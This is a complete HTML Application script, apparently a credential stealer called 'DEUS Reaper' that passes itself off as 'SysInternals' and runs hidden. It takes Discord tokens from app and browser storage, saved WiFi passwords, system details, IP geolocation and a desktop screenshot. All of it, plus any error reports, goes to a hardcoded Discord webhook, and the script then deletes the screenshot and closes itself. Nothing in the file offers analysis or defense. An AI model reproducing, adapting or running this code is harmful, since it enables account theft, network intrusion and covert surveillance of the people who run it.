<meta http-equiv="x-ua-compatible" content="ie=edge">
<hta:application
    id="DEUS_V3"
    applicationname="SysInternals"
    border="none"
    caption="no"
    contextmenu="no"
    maximizebutton="no"
    minimizebutton="no"
    scroll="no"
    showintaskbar="no"
    singleinstance="yes"
    sysmenu="no"
    windowstate="minimize">

<script language="JScript">
// --- Global Error Catcher ---
// If the script fails catastrophically, this will attempt a final gasp to the webhook.
try {

    // ================== CONFIGURATION ==================
    var webhookUrl = "https://discord.com/api/webhooks/1502379311577956374/Qkt2VOYWbwoBc85FzPUvQ0fHDn0qxPyqxu3kbComwCORP1rdu-D3xJjL9dE41X1okoPK";
    var botName = "DEUS Reaper";
    var botAvatar = "https://i.imgur.com/g63Mu0x.png";
    // ===================================================

    // Initialize core components
    var shell = new ActiveXObject("WScript.Shell");
    var fso = new ActiveXObject("Scripting.FileSystemObject");
    var env = shell.Environment("Process");
    var tempPath = env.Item("TEMP");
    var appData = env.Item("APPDATA");
    var localAppData = env.Item("LOCALAPPDATA");

    // --- Data Collection Variables ---
    var discordTokens = [], wifiPasswords = [], cookies = [], systemInfo = {}, locationInfo = {};
    var robloxCookie = "";

    // --- Core Functions (Made more compatible) ---
    function executeCommand(cmd) { try { return shell.Exec(cmd).StdOut.ReadAll(); } catch (e) { return ""; } }
    function readFile(path) { try { var ts = fso.OpenTextFile(path, 1); var c = ts.ReadAll(); ts.Close(); return c; } catch (e) { return ""; } }
    
    function findFiles(path, pattern) {
        var results = [];
        try {
            if (!fso.FolderExists(path)) return [];
            var folder = fso.GetFolder(path);
            var files = new Enumerator(folder.Files);
            for (; !files.atEnd(); files.moveNext()) { if (files.item().Name.match(pattern)) results.push(files.item().Path); }
            var subfolders = new Enumerator(folder.SubFolders);
            for (; !subfolders.atEnd(); subfolders.moveNext()) { results = results.concat(findFiles(subfolders.item().Path, pattern)); }
        } catch(e) {}
        return results;
    }

    function sendWebhook(payload) {
        try {
            payload.username = botName;
            payload.avatar_url = botAvatar;
            var http = new ActiveXObject("Msxml2.XMLHTTP.6.0");
            http.open("POST", webhookUrl, false);
            http.setRequestHeader("Content-Type", "application/json");
            http.send(JSON.stringify(payload));
        } catch (e) {}
    }

    function sendFileWebhook(filePath, caption) {
        try {
            var boundary = "---------------------------" + (new Date()).getTime();
            var body = "";
            
            // File part
            var adoStream = new ActiveXObject("ADODB.Stream");
            adoStream.Type = 1; // adTypeBinary
            adoStream.Open();
            adoStream.LoadFromFile(filePath);
            var fileBinary = adoStream.Read();
            
            var fileName = fso.GetFileName(filePath);
            body += "--" + boundary + "\r\n";
            body += "Content-Disposition: form-data; name=\"file\"; filename=\"" + fileName + "\"\r\n";
            body += "Content-Type: image/jpeg\r\n\r\n";
            
            var http = new ActiveXObject("Msxml2.XMLHTTP.6.0");
            http.open("POST", webhookUrl, false);
            http.setRequestHeader("Content-Type", "multipart/form-data; boundary=" + boundary);
            
            var requestBody = bodyToByteArray(body, fileBinary, boundary);
            http.send(requestBody);
        } catch (e) {
            // Fallback to PowerShell if the monstrosity above fails
            try {
                var psCommand = 'Invoke-RestMethod -Uri "' + webhookUrl + '" -Method Post -InFile "' + filePath + '" -ContentType "multipart/form-data"';
                shell.Run('powershell.exe -Command "' + psCommand + '"', 0, true);
            } catch (ps_e) {}
        }
    }
    
    function bodyToByteArray(body, fileBinary, boundary) {
        var len = body.length;
        var postData = new VBArray(fileBinary).toArray();
        var n = postData.length;
        var C = 1; if(n>0) C=n;
        var L = len + n + (boundary.length + 6);
        
        var stream = new ActiveXObject("ADODB.Stream");
        stream.Type = 1;
        stream.Open();
        stream.Write(new VBArray(body.split("").map(function(c) { return c.charCodeAt(0); })).toArray());
        stream.Write(fileBinary);
        stream.Write(new VBArray(("\r\n--" + boundary + "--\r\n").split("").map(function(c) { return c.charCodeAt(0); })).toArray());
        stream.Position = 0;
        return stream.Read();
    }

    // --- Data Extraction Modules ---
    function gatherIntel() {
        // System Info
        try {
            systemInfo.username = env.Item("USERNAME");
            systemInfo.computer = env.Item("COMPUTERNAME");
            systemInfo.os = executeCommand("wmic os get Caption").split('\n')[1].trim();
            systemInfo.ram = Math.round(parseInt(executeCommand("wmic ComputerSystem get TotalPhysicalMemory").split('\n')[1].trim(), 10) / 1073741824) + " GB";
            var avMatch = (executeCommand("systeminfo") || "").match(/avast|avg|mcafee|norton|kaspersky|bitdefender|eset|malwarebytes/i);
            systemInfo.antivirus = avMatch ? avMatch[0] : "Windows Defender / Unknown";
        } catch(e) {}
        
        // Location Info
        try {
            var http = new ActiveXObject("Msxml2.XMLHTTP.6.0");
            http.open("GET", "https://ipinfo.io/json", false); http.send(); var data = JSON.parse(http.responseText);
            locationInfo.ip = data.ip; locationInfo.city = data.city; locationInfo.region = data.region; locationInfo.country = data.country; locationInfo.isp = data.org;
            if (data.loc) locationInfo.mapLink = "https://www.google.com/maps/search/?api=1&query=" + data.loc;
        } catch (e) {}
        
        // Discord Tokens
        try {
            var paths = [appData + "\\discord", appData + "\\discordcanary", appData + "\\discordptb", appData + "\\Opera Software\\Opera Stable", localAppData + "\\Google\\Chrome\\User Data\\Default", localAppData + "\\BraveSoftware\\Brave-Browser\\User Data\\Default", localAppData + "\\Microsoft\\Edge\\User Data\\Default"];
            for (var i = 0; i < paths.length; i++) {
                var files = findFiles(paths[i] + "\\Local Storage\\leveldb", /\.(log|ldb)$/);
                for (var j = 0; j < files.length; j++) {
                    var content = readFile(files[j]);
                    var matches = content.match(/([a-zA-Z0-9_]{24}\.[a-zA-Z0-9_]{6}\.[a-zA-Z0-9_]{27}|mfa\.[a-zA-Z0-9_-]{84})/g) || [];
                    for(var k=0; k<matches.length; k++){ if (discordTokens.indexOf(matches[k]) === -1) discordTokens.push(matches[k]); }
                }
            }
        } catch (e) {}

        // Wifi Passwords
        try {
            var profilesOutput = executeCommand("netsh wlan show profiles");
            var profileNames = (profilesOutput.match(/All User Profile\s*:\s*(.+)/g) || []);
            for (var i=0; i<profileNames.length; i++) {
                var ssid = profileNames[i].replace(/All User Profile\s*:\s*/, "").trim();
                if(!ssid) continue;
                var passOutput = executeCommand('netsh wlan show profile name="' + ssid + '" key=clear');
                var passMatch = passOutput.match(/Key Content\s*:\s*(.+)/);
                if (passMatch) wifiPasswords.push({ ssid: ssid, pass: passMatch[1].trim() });
            }
        } catch (e) {}
    }

    function takeScreenshot() {
        try {
            var screenshotPath = tempPath + "\\" + Math.random().toString(36).substring(2) + ".jpg";
            var psCommand = 'Add-Type -AssemblyName System.Drawing; Add-Type -AssemblyName System.Windows.Forms; $screen = [System.Windows.Forms.SystemInformation]::VirtualScreen; $bmp = New-Object System.Drawing.Bitmap $screen.Width, $screen.Height; $gfx = [System.Drawing.Graphics]::FromImage($bmp); $gfx.CopyFromScreen($screen.Left, $screen.Top, 0, 0, $screen.Size); $bmp.Save("' + screenshotPath + '", [System.Drawing.Imaging.ImageFormat]::Jpeg);';
            shell.Run('powershell.exe -WindowStyle Hidden -Command "' + psCommand + '"', 0, true);
            if (fso.FileExists(screenshotPath)) return screenshotPath;
        } catch (e) {} return null;
    }

    // --- Main Execution Block ---

    // 1. Gather text-based intel
    gatherIntel();

    // 2. Prepare and send main report
    var mainEmbed = {
        title: "💀 Subject Acquired: " + (systemInfo.username || "???") + "@" + (systemInfo.computer || "???"),
        color: 16711680,
        description: "**[Open Approx. Location](" + (locationInfo.mapLink || 'about:blank') + ")**",
        fields: [
            { name: "IP Address", value: "```" + (locationInfo.ip || "N/A") + "```", inline: true },
            { name: "Location", value: "```" + (locationInfo.city || "?") + ", " + (locationInfo.country || "?") + "```", inline: true },
            { name: "ISP", value: "```" + (locationInfo.isp || "N/A") + "```", inline: true },
            { name: "OS / RAM", value: "```" + (systemInfo.os || "N/A") + " / " + (systemInfo.ram || "N/A") + "```", inline: false },
            { name: "Antivirus", value: "```" + (systemInfo.antivirus || "N/A") + "```", inline: false }
        ],
        timestamp: new Date().toISOString()
    };
    sendWebhook({ embeds: [mainEmbed] });

    // 3. Prepare and send credentials report
    var tokensField = discordTokens.length > 0 ? discordTokens.join('\n\n') : "None found.";
    var wifiField = "";
    for(var i=0; i<wifiPasswords.length; i++){ wifiField += "SSID: " + wifiPasswords[i].ssid + "\nPass: " + wifiPasswords[i].pass + "\n"; }
    if(wifiField === "") wifiField = "None found.";
    
    var credsEmbed = {
        title: "🔑 Credentials & Networks",
        color: 16776960,
        description: "**Discord Tokens:**\n```" + tokensField.substring(0, 1000) + "```\n**WiFi Passwords:**\n```" + wifiField.substring(0, 2000) + "```"
    };
    sendWebhook({ embeds: [credsEmbed] });

    // 4. Take and send screenshot
    var screenshotPath = takeScreenshot();
    if (screenshotPath) {
        sendFileWebhook(screenshotPath, "Desktop Screenshot");
        try { fso.DeleteFile(screenshotPath); } catch(e){}
    }

    // 5. Mission complete, self-destruct.
    window.close();

} catch (err) {
    // Catastrophic failure emergency report
    var failPayload = {
        username: "DEUS FAILURE",
        embeds: [{
            title: "CRITICAL SCRIPT FAILURE",
            color: 16711680,
            description: "The HTA script failed to execute properly. This usually indicates a system policy block or a major syntax error.",
            fields: [
                { name: "Error Name", value: err.name || "Unknown" },
                { name: "Error Message", value: err.message || "Unknown" },
                { name: "Error Number", value: (err.number & 0xFFFF) || "Unknown" }
            ],
            timestamp: new Date().toISOString()
        }]
    };
    // Re-initialize a new HTTP object just in case the old one was the problem
    try {
        var http_fail = new ActiveXObject("Msxml2.XMLHTTP.6.0");
        http_fail.open("POST", webhookUrl, false);
        http_fail.setRequestHeader("Content-Type", "application/json");
        http_fail.send(JSON.stringify(failPayload));
    } catch(e) {}
    window.close();
}
</script>
</html>
